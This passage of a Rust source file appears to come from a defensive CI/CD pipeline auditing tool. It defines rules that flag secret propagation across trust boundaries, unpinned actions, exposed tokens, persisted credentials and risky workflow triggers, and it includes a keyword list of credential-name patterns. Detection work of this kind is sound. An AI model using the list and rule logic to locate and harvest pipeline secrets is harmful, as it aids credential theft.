Skip to main content

taudit_core/
rules.rs

1use crate::finding::{
2    Finding, FindingCategory, FindingExtras, FindingSource, Recommendation, Severity,
3};
4use crate::graph::{
5    is_docker_digest_pinned, is_pin_semantically_valid, AuthorityGraph, EdgeKind, IdentityScope,
6    NodeId, NodeKind, TrustZone, META_ADD_SPN_TO_ENV, META_ATTESTS, META_CACHE_KEY,
7    META_CHECKOUT_REF, META_CHECKOUT_SELF, META_CLI_FLAG_EXPOSED, META_CONTAINER, META_DIGEST,
8    META_DISPATCH_INPUTS, META_DOTENV_FILE, META_DOWNLOADS_ARTIFACT, META_ENVIRONMENT_NAME,
9    META_ENVIRONMENT_URL, META_ENV_APPROVAL, META_FORK_CHECK, META_GITLAB_ALLOW_FAILURE,
10    META_GITLAB_CACHE_KEY, META_GITLAB_CACHE_POLICY, META_GITLAB_DIND_SERVICE, META_GITLAB_EXTENDS,
11    META_GITLAB_INCLUDES, META_GITLAB_TRIGGER_KIND, META_IDENTITY_SCOPE, META_IMPLICIT,
12    META_INTERACTIVE_DEBUG, META_INTERPRETS_ARTIFACT, META_JOB_NAME, META_JOB_OUTPUTS, META_NEEDS,
13    META_NO_WORKFLOW_PERMISSIONS, META_OIDC, META_OIDC_AUDIENCE, META_PERMISSIONS, META_PLATFORM,
14    META_READS_ENV, META_REPOSITORIES, META_RULES_PROTECTED_ONLY, META_SCRIPT_BODY,
15    META_SECRETS_INHERIT, META_SELF_HOSTED, META_SERVICE_CONNECTION, META_SERVICE_CONNECTION_NAME,
16    META_TERRAFORM_AUTO_APPROVE, META_TRIGGER, META_TRIGGERS, META_VARIABLE_GROUP,
17    META_WORKSPACE_CLEAN, META_WRITES_ENV_GATE,
18};
19use crate::propagation;
20
21/// MVP Rule 1: Authority (secret/identity) propagated across a trust boundary.
22///
23/// **Clustering (v0.9.x):** all paths from the same root authority node
24/// (Secret/Identity) collapse into ONE finding per source. The single
25/// finding carries every reached sink in `nodes_involved` — `[source,
26/// sink_a, sink_b, ...]` — and lists them in the message. This matches
27/// the SARIF fingerprint behaviour (which already collapses per
28/// `root_authority_node_name`) and removes the alert-fatigue cliff seen
29/// on the GHA corpus where one `GITHUB_TOKEN` could produce 8+ near-
30/// identical findings as it propagated through a matrix workflow.
31///
32/// Severity graduation (per-path, then max-over-paths):
33/// - Untrusted sink: Critical (real risk — unpinned code with authority)
34/// - SHA-pinned ThirdParty sink: High (immutable code, but still cross-boundary)
35/// - SHA-pinned sink + constrained identity: Medium (lowest-risk form — read-only
36///   token to immutable third-party code, e.g. `contents:read` → `actions/checkout@sha`)
37///
38/// When every path in a cluster crosses an environment approval gate,
39/// the cluster's severity is downgraded one step (mirroring the
40/// per-path downgrade the previous emitter applied).
41pub fn authority_propagation(graph: &AuthorityGraph, max_hops: usize) -> Vec<Finding> {
42    let paths = propagation::propagation_analysis(graph, max_hops);
43
44    // Group by root authority source node. We preserve insertion order so
45    // findings come out in the same order they would have under per-hop
46    // emission (callers and golden-file tests rely on the source-first
47    // ordering of authority_propagation findings).
48    let mut order: Vec<NodeId> = Vec::new();
49    let mut groups: std::collections::HashMap<NodeId, Vec<propagation::PropagationPath>> =
50        std::collections::HashMap::new();
51
52    for path in paths.into_iter().filter(|p| p.crossed_boundary) {
53        groups
54            .entry(path.source)
55            .or_insert_with(|| {
56                order.push(path.source);
57                Vec::new()
58            })
59            .push(path);
60    }
61
62    let mut findings = Vec::with_capacity(order.len());
63
64    for source_id in order {
65        let paths = match groups.remove(&source_id) {
66            Some(p) if !p.is_empty() => p,
67            _ => continue,
68        };
69
70        let source_name = graph
71            .node(source_id)
72            .map(|n| n.name.as_str())
73            .unwrap_or("?")
74            .to_string();
75        let source_is_constrained = graph
76            .node(source_id)
77            .and_then(|n| n.metadata.get(META_IDENTITY_SCOPE))
78            .map(|s| s == "constrained")
79            .unwrap_or(false);
80        let source_is_oidc = graph
81            .node(source_id)
82            .and_then(|n| n.metadata.get(META_OIDC))
83            .map(|v| v == "true")
84            .unwrap_or(false);
85
86        // Walk every path in the cluster and compute (severity, gated?,
87        // sink id, representative path) — the cluster takes the max
88        // severity (i.e. the worst sink wins). Severity is downgraded
89        // only when every path in the cluster crosses an env-approval
90        // gate; if even one path bypasses the gate, the cluster is not
91        // downgraded.
92        let mut worst_sev = Severity::Info;
93        let mut all_gated = true;
94        let mut best_path: Option<propagation::PropagationPath> = None;
95        let mut sink_ids: Vec<NodeId> = Vec::new();
96        let mut seen_sinks = std::collections::HashSet::new();
97
98        for path in &paths {
99            let sink_is_pinned = graph
100                .node(path.sink)
101                .map(|n| {
102                    n.trust_zone == TrustZone::ThirdParty && n.metadata.contains_key(META_DIGEST)
103                })
104                .unwrap_or(false);
105
106            let base_severity = if sink_is_pinned && source_is_constrained && !source_is_oidc {
107                Severity::Medium
108            } else if sink_is_pinned && !source_is_oidc {
109                Severity::High
110            } else {
111                Severity::Critical
112            };
113
114            let gated = path_crosses_env_approval(graph, path);
115            let effective_severity = if gated {
116                downgrade_one_step(base_severity)
117            } else {
118                base_severity
119            };
120
121            if !gated {
122                all_gated = false;
123            }
124
125            if effective_severity < worst_sev {
126                worst_sev = effective_severity;
127                best_path = Some(path.clone());
128            }
129
130            if seen_sinks.insert(path.sink) {
131                sink_ids.push(path.sink);
132            }
133        }
134
135        // Build sink name list for the message. Truncate aggressively past
136        // ~5 names to avoid an unbounded message string on extreme inputs;
137        // the full set is still in `nodes_involved`.
138        let mut sink_names: Vec<String> = sink_ids
139            .iter()
140            .filter_map(|id| graph.node(*id).map(|n| n.name.clone()))
141            .collect();
142        let truncated = if sink_names.len() > 5 {
143            let extra = sink_names.len() - 5;
144            sink_names.truncate(5);
145            format!(", …+{extra} more")
146        } else {
147            String::new()
148        };
149        let sink_list = sink_names.join(", ");
150
151        let suffix = if all_gated && !paths.is_empty() {
152            " (mitigated: environment approval gate)"
153        } else {
154            ""
155        };
156
157        let mut nodes_involved = Vec::with_capacity(sink_ids.len() + 1);
158        nodes_involved.push(source_id);
159        nodes_involved.extend(sink_ids.iter().copied());
160
161        let n = paths.len();
162        let unique_sinks = sink_ids.len();
163        let message = if unique_sinks == 1 {
164            format!("{source_name} propagated to {sink_list} across trust boundary{suffix}")
165        } else {
166            format!(
167                "{source_name} reaches {unique_sinks} sinks via authority propagation: [{sink_list}{truncated}]{suffix}"
168            )
169        };
170
171        let _ = n; // path count retained in the cluster's `path` field; not surfaced separately
172
173        findings.push(Finding {
174            severity: worst_sev,
175            category: FindingCategory::AuthorityPropagation,
176            nodes_involved,
177            message,
178            recommendation: Recommendation::TsafeRemediation {
179                command: "tsafe exec --ns <scoped-namespace> -- <command>".to_string(),
180                explanation: format!("Scope {source_name} to only the steps that need it"),
181            },
182            path: best_path,
183            source: FindingSource::BuiltIn,
184            extras: FindingExtras::default(),
185        });
186    }
187
188    findings
189}
190
191/// Returns true if any node touched by `path` (source, sink, or any edge
192/// endpoint along the way) carries META_ENV_APPROVAL = "true".
193fn path_crosses_env_approval(graph: &AuthorityGraph, path: &propagation::PropagationPath) -> bool {
194    let has_marker = |id: NodeId| {
195        graph
196            .node(id)
197            .and_then(|n| n.metadata.get(META_ENV_APPROVAL))
198            .map(|v| v == "true")
199            .unwrap_or(false)
200    };
201
202    if has_marker(path.source) || has_marker(path.sink) {
203        return true;
204    }
205
206    for &edge_id in &path.edges {
207        if let Some(edge) = graph.edge(edge_id) {
208            if has_marker(edge.from) || has_marker(edge.to) {
209                return true;
210            }
211        }
212    }
213    false
214}
215
216/// Reduce a severity by one step. Critical→High, High→Medium, Medium→Low.
217/// Low and Info are already at the floor of meaningful reduction and are
218/// returned unchanged.
219fn downgrade_one_step(severity: Severity) -> Severity {
220    match severity {
221        Severity::Critical => Severity::High,
222        Severity::High => Severity::Medium,
223        Severity::Medium => Severity::Low,
224        Severity::Low => Severity::Low,
225        Severity::Info => Severity::Info,
226    }
227}
228
229/// MVP Rule 2: Identity scope broader than actual usage.
230///
231/// Uses `IdentityScope` classification from the precision layer. Broad and
232/// Unknown scopes are flagged — Unknown is treated as risky because if we
233/// can't determine the scope, we shouldn't assume it's safe.
234pub fn over_privileged_identity(graph: &AuthorityGraph) -> Vec<Finding> {
235    let mut findings = Vec::new();
236
237    for identity in graph.nodes_of_kind(NodeKind::Identity) {
238        let granted_scope = identity
239            .metadata
240            .get(META_PERMISSIONS)
241            .cloned()
242            .unwrap_or_default();
243
244        // Use IdentityScope from metadata if set by parser, otherwise classify from permissions
245        let scope = identity
246            .metadata
247            .get(META_IDENTITY_SCOPE)
248            .and_then(|s| match s.as_str() {
249                "broad" => Some(IdentityScope::Broad),
250                "constrained" => Some(IdentityScope::Constrained),
251                "unknown" => Some(IdentityScope::Unknown),
252                _ => None,
253            })
254            .unwrap_or_else(|| IdentityScope::from_permissions(&granted_scope));
255
256        // Broad or Unknown scope — flag it. Unknown is treated as risky.
257        let (should_flag, severity) = match scope {
258            IdentityScope::Broad => (true, Severity::High),
259            IdentityScope::Unknown => (true, Severity::Medium),
260            IdentityScope::Constrained => (false, Severity::Info),
261        };
262
263        if !should_flag {
264            continue;
265        }
266
267        let accessor_steps: Vec<_> = graph
268            .edges_to(identity.id)
269            .filter(|e| e.kind == EdgeKind::HasAccessTo)
270            .filter_map(|e| graph.node(e.from))
271            .collect();
272
273        if !accessor_steps.is_empty() {
274            let scope_label = match scope {
275                IdentityScope::Broad => "broad",
276                IdentityScope::Unknown => "unknown (treat as risky)",
277                IdentityScope::Constrained => "constrained",
278            };
279
280            findings.push(Finding {
281                severity,
282                category: FindingCategory::OverPrivilegedIdentity,
283                path: None,
284                nodes_involved: std::iter::once(identity.id)
285                    .chain(accessor_steps.iter().map(|n| n.id))
286                    .collect(),
287                message: format!(
288                    "{} has {} scope (permissions: '{}') — likely broader than needed",
289                    identity.name, scope_label, granted_scope
290                ),
291                recommendation: Recommendation::ReducePermissions {
292                    current: granted_scope.clone(),
293                    minimum: "{ contents: read }".into(),
294                },
295                source: FindingSource::BuiltIn,
296                // Working out the minimum-needed scope across N jobs is a
297                // ~1 hour audit, not a flag flip — Small.
298                extras: FindingExtras {
299                    time_to_fix: Some(crate::finding::FixEffort::Small),
300                    ..FindingExtras::default()
301                },
302            });
303        }
304    }
305
306    findings
307}
308
309/// MVP Rule 3: Third-party action/image without SHA pin.
310///
311/// **Severity tiering (v0.9.x):** the rule used to fire at a single severity
312/// regardless of which action was unpinned, which produced uniform noise on
313/// monorepo CI files where the action owner determined the actual risk.
314/// The blue-team corpus report (`MEMORY/.../blueteam-corpus-defense.md`)
315/// recommended splitting:
316///   * Same-repo composite action (`./.github/actions/*`) → **Info**.
317///     The action lives in the consumer's own repo — there's no external
318///     supply-chain surface; pinning is a hygiene preference, not a
319///     control gap.
320///   * Owner is a well-known first-party org (`actions/*`, `github/*`,
321///     `actions-rs/*`, `docker/*`) → **Medium**. These are GitHub-org or
322///     adjacent tooling maintainers; the supply-chain surface exists but
323///     is operationally narrow and well-monitored.
324///   * Anything else (`random-org/foo@v1`, etc.) → **High**. Unbounded
325///     supply-chain risk — this is the case the rule was originally
326///     designed for.
327///
328/// Deduplicates by action reference — the same action used in multiple jobs
329/// produces multiple Image nodes but should only be flagged once.
330pub fn unpinned_action(graph: &AuthorityGraph) -> Vec<Finding> {
331    let mut findings = Vec::new();
332    let mut seen = std::collections::HashSet::new();
333
334    for image in graph.nodes_of_kind(NodeKind::Image) {
335        // Container images are handled by floating_image — skip here to avoid
336        // double-flagging the same node as both UnpinnedAction and FloatingImage.
337        if image
338            .metadata
339            .get(META_CONTAINER)
340            .map(|v| v == "true")
341            .unwrap_or(false)
342        {
343            continue;
344        }
345
346        // Self-hosted runner labels live in the FirstParty zone but aren't
347        // an action reference — they have no `@version` to pin and the rule
348        // would otherwise flag every `runs-on: self-hosted` line.
349        if image
350            .metadata
351            .get(META_SELF_HOSTED)
352            .map(|v| v == "true")
353            .unwrap_or(false)
354        {
355            continue;
356        }
357
358        // Same-repo composite actions (`./.github/actions/foo`) sit in the
359        // FirstParty zone. Other FirstParty Image nodes (e.g. self-hosted
360        // pool labels, hosted runner names) are not flaggable references —
361        // we admit FirstParty into the severity ladder ONLY when the name
362        // is the relative-path form, and emit Info for it.
363        let is_local_composite = image.name.starts_with("./");
364        if image.trust_zone == TrustZone::FirstParty && !is_local_composite {
365            continue;
366        }
367
368        // Deduplicate: same action reference flagged once
369        if !seen.insert(&image.name) {
370            continue;
371        }
372
373        let has_digest = image.metadata.contains_key(META_DIGEST);
374
375        if has_digest || is_pin_semantically_valid(&image.name) {
376            continue;
377        }
378
379        // Tier severity by owner. `is_local_composite` already handled the
380        // same-repo case; for everything else, look at the `<owner>/...`
381        // prefix and decide first-party vs unknown supplier.
382        let severity = if is_local_composite {
383            Severity::Info
384        } else if is_well_known_first_party_action(&image.name) {
385            Severity::Medium
386        } else {
387            Severity::High
388        };
389
390        findings.push(Finding {
391            severity,
392            category: FindingCategory::UnpinnedAction,
393            path: None,
394            nodes_involved: vec![image.id],
395            message: format!("{} is not pinned to a SHA digest", image.name),
396            recommendation: Recommendation::PinAction {
397                current: image.name.clone(),
398                pinned: format!(
399                    "{}@<sha256-digest>",
400                    image.name.split('@').next().unwrap_or(&image.name)
401                ),
402            },
403            source: FindingSource::BuiltIn,
404            // Mechanical fix: replace `@v3` with `@<40-char-sha>`. ~5 min.
405            extras: FindingExtras {
406                time_to_fix: Some(crate::finding::FixEffort::Trivial),
407                ..FindingExtras::default()
408            },
409        });
410    }
411
412    findings
413}
414
415/// Owners we treat as well-known first-party for the purpose of severity
416/// tiering. The list is intentionally short and conservative — adding an
417/// org here downgrades every unpinned action it ships, so the bar is
418/// "GitHub-maintained or directly adjacent core tooling." Anything else
419/// stays at the High default.
420fn is_well_known_first_party_action(uses: &str) -> bool {
421    // Strip an optional `@<ref>` suffix, then take the leading owner segment.
422    let bare = uses.split('@').next().unwrap_or(uses);
423    let owner = bare.split('/').next().unwrap_or("");
424    matches!(owner, "actions" | "github" | "actions-rs" | "docker")
425}
426
427/// MVP Rule 4: Untrusted step has direct access to secret/identity.
428pub fn untrusted_with_authority(graph: &AuthorityGraph) -> Vec<Finding> {
429    let mut findings = Vec::new();
430
431    for step in graph.nodes_in_zone(TrustZone::Untrusted) {
432        if step.kind != NodeKind::Step {
433            continue;
434        }
435
436        // Check if this untrusted step directly accesses any authority source
437        for edge in graph.edges_from(step.id) {
438            if edge.kind != EdgeKind::HasAccessTo {
439                continue;
440            }
441
442            if let Some(target) = graph.node(edge.to) {
443                if matches!(target.kind, NodeKind::Secret | NodeKind::Identity) {
444                    let cli_flag_exposed = target
445                        .metadata
446                        .get(META_CLI_FLAG_EXPOSED)
447                        .map(|v| v == "true")
448                        .unwrap_or(false);
449
450                    // Platform-implicit tokens (e.g. ADO System.AccessToken) are structurally
451                    // accessible to all tasks by design. Flag at Info — real but not actionable
452                    // as a misconfiguration. Explicit secrets/service connections stay Critical.
453                    let is_implicit = target
454                        .metadata
455                        .get(META_IMPLICIT)
456                        .map(|v| v == "true")
457                        .unwrap_or(false);
458
459                    let recommendation = if target.kind == NodeKind::Secret {
460                        if cli_flag_exposed {
461                            Recommendation::Manual {
462                                action: format!(
463                                    "Move '{}' from -var flag to TF_VAR_{} env var — \
464                                     -var values appear in pipeline logs and Terraform plan output",
465                                    target.name, target.name
466                                ),
467                            }
468                        } else {
469                            Recommendation::CellosRemediation {
470                                reason: format!(
471                                    "Untrusted step '{}' has direct access to secret '{}'",
472                                    step.name, target.name
473                                ),
474                                spec_hint: format!(
475                                    "cellos run --network deny-all --broker env:{}",
476                                    target.name
477                                ),
478                            }
479                        }
480                    } else {
481                        // Identity branch — for implicit platform tokens, add a CellOS
482                        // compensating-control note since the token cannot be un-injected
483                        // at the platform layer.
484                        let minimum = if is_implicit {
485                            "minimal required scope — or use CellOS deny-all egress as a compensating control to limit exfiltration of the injected token".into()
486                        } else {
487                            "minimal required scope".into()
488                        };
489                        Recommendation::ReducePermissions {
490                            current: target
491                                .metadata
492                                .get(META_PERMISSIONS)
493                                .cloned()
494                                .unwrap_or_else(|| "unknown".into()),
495                            minimum,
496                        }
497                    };
498
499                    let log_exposure_note = if cli_flag_exposed {
500                        " (passed as -var flag — value visible in pipeline logs)"
501                    } else {
502                        ""
503                    };
504
505                    let (severity, message) =
506                        if is_implicit {
507                            (
508                                Severity::Info,
509                                format!(
510                                "Untrusted step '{}' has structural access to implicit {} '{}' \
511                                 (platform-injected — all tasks receive this token by design){}",
512                                step.name,
513                                if target.kind == NodeKind::Secret { "secret" } else { "identity" },
514                                target.name,
515                                log_exposure_note,
516                            ),
517                            )
518                        } else {
519                            (
520                                Severity::Critical,
521                                format!(
522                                    "Untrusted step '{}' has direct access to {} '{}'{}",
523                                    step.name,
524                                    if target.kind == NodeKind::Secret {
525                                        "secret"
526                                    } else {
527                                        "identity"
528                                    },
529                                    target.name,
530                                    log_exposure_note,
531                                ),
532                            )
533                        };
534
535                    findings.push(Finding {
536                        severity,
537                        category: FindingCategory::UntrustedWithAuthority,
538                        path: None,
539                        nodes_involved: vec![step.id, target.id],
540                        message,
541                        recommendation,
542                        source: FindingSource::BuiltIn,
543                        extras: FindingExtras::default(),
544                    });
545                }
546            }
547        }
548    }
549
550    findings
551}
552
553/// MVP Rule 5: Artifact produced by privileged step consumed across trust boundary.
554pub fn artifact_boundary_crossing(graph: &AuthorityGraph) -> Vec<Finding> {
555    let mut findings = Vec::new();
556
557    for artifact in graph.nodes_of_kind(NodeKind::Artifact) {
558        // Find producer(s)
559        let producers: Vec<_> = graph
560            .edges_to(artifact.id)
561            .filter(|e| e.kind == EdgeKind::Produces)
562            .filter_map(|e| graph.node(e.from))
563            .collect();
564
565        // Find consumer(s) — Consumes edges go artifact -> step
566        let consumers: Vec<_> = graph
567            .edges_from(artifact.id)
568            .filter(|e| e.kind == EdgeKind::Consumes)
569            .filter_map(|e| graph.node(e.to))
570            .collect();
571
572        for producer in &producers {
573            for consumer in &consumers {
574                // Skip intra-job pairs: upload → download within the same job
575                // is a legitimate temp-file pattern. The trust crossing is only
576                // meaningful when the artifact crosses a job boundary.
577                let prod_job = producer
578                    .metadata
579                    .get(META_JOB_NAME)
580                    .map(String::as_str)
581                    .unwrap_or("");
582                let cons_job = consumer
583                    .metadata
584                    .get(META_JOB_NAME)
585                    .map(String::as_str)
586                    .unwrap_or("");
587                if !prod_job.is_empty() && prod_job == cons_job {
588                    continue;
589                }
590
591                if producer.trust_zone.is_lower_than(&consumer.trust_zone) {
592                    findings.push(Finding {
593                        severity: Severity::High,
594                        category: FindingCategory::ArtifactBoundaryCrossing,
595                        path: None,
596                        nodes_involved: vec![producer.id, artifact.id, consumer.id],
597                        message: format!(
598                            "Untrusted artifact '{}' produced by '{}' ({:?}) consumed by privileged step '{}' ({:?})",
599                            artifact.name,
600                            producer.name,
601                            producer.trust_zone,
602                            consumer.name,
603                            consumer.trust_zone
604                        ),
605                        recommendation: Recommendation::Manual {
606                            action: "Ensure the artifact producer runs in a trusted job; restrict which jobs can consume the artifact using platform-specific controls (e.g. environment protection rules, manual approval gates).".into(),
607                        },
608                        source: FindingSource::BuiltIn,
609                        extras: FindingExtras::default(),
610                    });
611                }
612            }
613        }
614    }
615
616    findings
617}
618
619/// Stretch Rule 9: Secret name matches known long-lived/static credential pattern.
620///
621/// Heuristic: secrets named like AWS keys, API keys, passwords, or private keys
622/// are likely static credentials that should be replaced with OIDC federation.
623pub fn long_lived_credential(graph: &AuthorityGraph) -> Vec<Finding> {
624    const STATIC_PATTERNS: &[&str] = &[
625        "AWS_ACCESS_KEY",
626        "AWS_SECRET_ACCESS_KEY",
627        "_API_KEY",
628        "_APIKEY",
629        "_PASSWORD",
630        "_PASSWD",
631        "_PRIVATE_KEY",
632        "_SECRET_KEY",
633        "_SERVICE_ACCOUNT",
634        "_SIGNING_KEY",
635    ];
636
637    let mut findings = Vec::new();
638
639    for secret in graph.nodes_of_kind(NodeKind::Secret) {
640        let upper = secret.name.to_uppercase();
641        let is_static = STATIC_PATTERNS.iter().any(|p| upper.contains(p));
642
643        if is_static {
644            findings.push(Finding {
645                severity: Severity::Low,
646                category: FindingCategory::LongLivedCredential,
647                path: None,
648                nodes_involved: vec![secret.id],
649                message: format!(
650                    "'{}' looks like a long-lived static credential",
651                    secret.name
652                ),
653                recommendation: Recommendation::FederateIdentity {
654                    static_secret: secret.name.clone(),
655                    oidc_provider: "GitHub Actions OIDC (id-token: write)".into(),
656                },
657                source: FindingSource::BuiltIn,
658                // Migrating from PATs to OIDC across an org touches identity
659                // policy, IAM trust relationships, and every downstream
660                // consumer of the credential — Large effort.
661                extras: FindingExtras {
662                    time_to_fix: Some(crate::finding::FixEffort::Large),
663                    ..FindingExtras::default()
664                },
665            });
666        }
667    }
668
669    findings
670}
671
672/// Tier 6 Rule: Container image without Docker digest pinning.
673///
674/// Job-level containers marked with `META_CONTAINER` that aren't pinned to
675/// `image@sha256:<64hex>` can be silently mutated between runs. Deduplicates
676/// by image name (same image in multiple jobs flags once).
677pub fn floating_image(graph: &AuthorityGraph) -> Vec<Finding> {
678    let mut findings = Vec::new();
679    let mut seen = std::collections::HashSet::new();
680
681    for image in graph.nodes_of_kind(NodeKind::Image) {
682        let is_container = image
683            .metadata
684            .get(META_CONTAINER)
685            .map(|v| v == "true")
686            .unwrap_or(false);
687
688        if !is_container {
689            continue;
690        }
691
692        if !seen.insert(image.name.as_str()) {
693            continue;
694        }
695
696        if !is_docker_digest_pinned(&image.name) {
697            findings.push(Finding {
698                severity: Severity::Medium,
699                category: FindingCategory::FloatingImage,
700                path: None,
701                nodes_involved: vec![image.id],
702                message: format!("Container image '{}' is not pinned to a digest", image.name),
703                recommendation: Recommendation::PinAction {
704                    current: image.name.clone(),
705                    pinned: format!(
706                        "{}@sha256:<digest>",
707                        image.name.split(':').next().unwrap_or(&image.name)
708                    ),
709                },
710                source: FindingSource::BuiltIn,
711                // `docker pull <image>` once and append `@sha256:<digest>` —
712                // identical mechanical fix to unpinned_action. Trivial.
713                extras: FindingExtras {
714                    time_to_fix: Some(crate::finding::FixEffort::Trivial),
715                    ..FindingExtras::default()
716                },
717            });
718        }
719    }
720
721    findings
722}
723
724/// Stretch Rule: checkout step with `persistCredentials: true` writes credentials to disk.
725///
726/// The PersistsTo edge connects a checkout step to the token it persists. Disk-resident
727/// credentials are accessible to all subsequent steps (and to any process with filesystem
728/// access), unlike runtime-only HasAccessTo authority which expires when the step exits.
729pub fn persisted_credential(graph: &AuthorityGraph) -> Vec<Finding> {
730    let mut findings = Vec::new();
731
732    for edge in &graph.edges {
733        if edge.kind != EdgeKind::PersistsTo {
734            continue;
735        }
736
737        let Some(step) = graph.node(edge.from) else {
738            continue;
739        };
740        let Some(target) = graph.node(edge.to) else {
741            continue;
742        };
743
744        findings.push(Finding {
745            severity: Severity::High,
746            category: FindingCategory::PersistedCredential,
747            path: None,
748            nodes_involved: vec![step.id, target.id],
749            message: format!(
750                "'{}' persists '{}' to disk via persistCredentials: true — \
751                 credential remains in .git/config and is accessible to all subsequent steps",
752                step.name, target.name
753            ),
754            recommendation: Recommendation::Manual {
755                action: "Remove persistCredentials: true from the checkout step. \
756                         Pass credentials explicitly only to steps that need them."
757                    .into(),
758            },
759            source: FindingSource::BuiltIn,
760            extras: FindingExtras::default(),
761        });
762    }
763
764    findings
765}
766
767/// Rule: dangerous trigger type (pull_request_target / pr) combined with secret/identity access.
768///
769/// Fires once per workflow when the graph-level `META_TRIGGER` indicates a high-risk
770/// trigger and at least one step holds authority. Aggregates all involved nodes.
771pub fn trigger_context_mismatch(graph: &AuthorityGraph) -> Vec<Finding> {
772    let trigger = match graph.metadata.get(META_TRIGGER) {
773        Some(t) => t.clone(),
774        None => return Vec::new(),
775    };
776
777    let severity = match trigger.as_str() {
778        "pull_request_target" => Severity::Critical,
779        "pr" => Severity::High,
780        _ => return Vec::new(),
781    };
782
783    // Collect steps that hold authority (HasAccessTo a Secret or Identity)
784    let mut steps_with_authority: Vec<NodeId> = Vec::new();
785    let mut authority_targets: Vec<NodeId> = Vec::new();
786
787    for step in graph.nodes_of_kind(NodeKind::Step) {
788        let mut step_holds_authority = false;
789        for edge in graph.edges_from(step.id) {
790            if edge.kind != EdgeKind::HasAccessTo {
791                continue;
792            }
793            if let Some(target) = graph.node(edge.to) {
794                if matches!(target.kind, NodeKind::Secret | NodeKind::Identity) {
795                    step_holds_authority = true;
796                    if !authority_targets.contains(&target.id) {
797                        authority_targets.push(target.id);
798                    }
799                }
800            }
801        }
802        if step_holds_authority {
803            steps_with_authority.push(step.id);
804        }
805    }
806
807    if steps_with_authority.is_empty() {
808        return Vec::new();
809    }
810
811    let n = steps_with_authority.len();
812    let mut nodes_involved = steps_with_authority.clone();
813    nodes_involved.extend(authority_targets);
814
815    vec![Finding {
816        severity,
817        category: FindingCategory::TriggerContextMismatch,
818        path: None,
819        nodes_involved,
820        message: format!(
821            "Workflow triggered by {trigger} with secret/identity access — {n} step(s) hold authority that attacker-controlled code could reach"
822        ),
823        recommendation: Recommendation::Manual {
824            action: "Use a separate workflow triggered by workflow_run (not pull_request_target) for privileged operations, or ensure no checkout of the PR head ref occurs before secret use".into(),
825        },
826        source: FindingSource::BuiltIn,
827        extras: FindingExtras::default(),
828}]
829}
830
831/// Rule: authority (secret/identity) flows into an opaque external workflow via DelegatesTo.
832///
833/// For each Step node: find all `DelegatesTo` edges to Image nodes where the trust zone
834/// is not FirstParty. If the same step also has `HasAccessTo` any Secret or Identity,
835/// emit one finding per delegation edge.
836pub fn cross_workflow_authority_chain(graph: &AuthorityGraph) -> Vec<Finding> {
837    let mut findings = Vec::new();
838
839    for step in graph.nodes_of_kind(NodeKind::Step) {
840        // Collect authority sources this step holds
841        let authority_nodes: Vec<&_> = graph
842            .edges_from(step.id)
843            .filter(|e| e.kind == EdgeKind::HasAccessTo)
844            .filter_map(|e| graph.node(e.to))
845            .filter(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
846            .collect();
847
848        if authority_nodes.is_empty() {
849            continue;
850        }
851
852        // Find each DelegatesTo edge to a non-FirstParty Image
853        for edge in graph.edges_from(step.id) {
854            if edge.kind != EdgeKind::DelegatesTo {
855                continue;
856            }
857            let Some(target) = graph.node(edge.to) else {
858                continue;
859            };
860            if target.kind != NodeKind::Image {
861                continue;
862            }
863            if target.trust_zone == TrustZone::FirstParty {
864                continue;
865            }
866
867            let severity = match target.trust_zone {
868                TrustZone::Untrusted => Severity::Critical,
869                TrustZone::ThirdParty => Severity::High,
870                TrustZone::FirstParty => continue,
871            };
872
873            let authority_names: Vec<String> =
874                authority_nodes.iter().map(|n| n.name.clone()).collect();
875            let authority_label = authority_names.join(", ");
876
877            let mut nodes_involved = vec![step.id, target.id];
878            nodes_involved.extend(authority_nodes.iter().map(|n| n.id));
879
880            findings.push(Finding {
881                severity,
882                category: FindingCategory::CrossWorkflowAuthorityChain,
883                path: None,
884                nodes_involved,
885                message: format!(
886                    "'{}' delegates to '{}' ({:?}) while holding authority ({}) — authority chain extends into opaque external workflow",
887                    step.name, target.name, target.trust_zone, authority_label
888                ),
889                recommendation: Recommendation::Manual {
890                    action: format!(
891                        "Pin '{}' to a full SHA digest; audit what authority the called workflow receives",
892                        target.name
893                    ),
894                },
895                source: FindingSource::BuiltIn,
896                        extras: FindingExtras::default(),
897});
898        }
899    }
900
901    findings
902}
903
904/// Rule: circular DelegatesTo chain — workflow calls itself transitively.
905///
906/// Iterative DFS over `DelegatesTo` edges. Detects back edges (gray → gray) and
907/// collects all nodes that participate in any cycle. If any cycles exist, emits
908/// a single High-severity finding listing all cycle members.
909pub fn authority_cycle(graph: &AuthorityGraph) -> Vec<Finding> {
910    let n = graph.nodes.len();
911    if n == 0 {
912        return Vec::new();
913    }
914
915    // Pre-build adjacency list for DelegatesTo edges only.
916    let mut delegates_to: Vec<Vec<NodeId>> = vec![Vec::new(); n];
917    for edge in &graph.edges {
918        if edge.kind == EdgeKind::DelegatesTo && edge.from < n && edge.to < n {
919            delegates_to[edge.from].push(edge.to);
920        }
921    }
922
923    let mut color: Vec<u8> = vec![0u8; n]; // 0=white, 1=gray, 2=black
924    let mut cycle_nodes: std::collections::BTreeSet<NodeId> = std::collections::BTreeSet::new();
925
926    for start in 0..n {
927        if color[start] != 0 {
928            continue;
929        }
930        color[start] = 1;
931        let mut stack: Vec<(NodeId, usize)> = vec![(start, 0)];
932
933        loop {
934            let len = stack.len();
935            if len == 0 {
936                break;
937            }
938            let (node_id, edge_idx) = stack[len - 1];
939            if edge_idx < delegates_to[node_id].len() {
940                stack[len - 1].1 += 1;
941                let neighbor = delegates_to[node_id][edge_idx];
942                if color[neighbor] == 1 {
943                    // Back edge: cycle found. Collect every node between `neighbor`
944                    // (the cycle start) and `node_id` (the cycle end) along the
945                    // current DFS stack. All stack entries are gray by construction,
946                    // so we walk the stack from `neighbor` to the top.
947                    let cycle_start_idx =
948                        stack.iter().position(|&(n, _)| n == neighbor).unwrap_or(0);
949                    for &(n, _) in &stack[cycle_start_idx..] {
950                        cycle_nodes.insert(n);
951                    }
952                } else if color[neighbor] == 0 {
953                    color[neighbor] = 1;
954                    stack.push((neighbor, 0));
955                }
956            } else {
957                color[node_id] = 2;
958                stack.pop();
959            }
960        }
961    }
962
963    if cycle_nodes.is_empty() {
964        return Vec::new();
965    }
966
967    vec![Finding {
968        severity: Severity::High,
969        category: FindingCategory::AuthorityCycle,
970        path: None,
971        nodes_involved: cycle_nodes.into_iter().collect(),
972        message:
973            "Circular delegation detected — workflow calls itself transitively, creating unbounded privilege escalation paths"
974                .into(),
975        recommendation: Recommendation::Manual {
976            action: "Break the delegation cycle — a workflow must not directly or transitively call itself".into(),
977        },
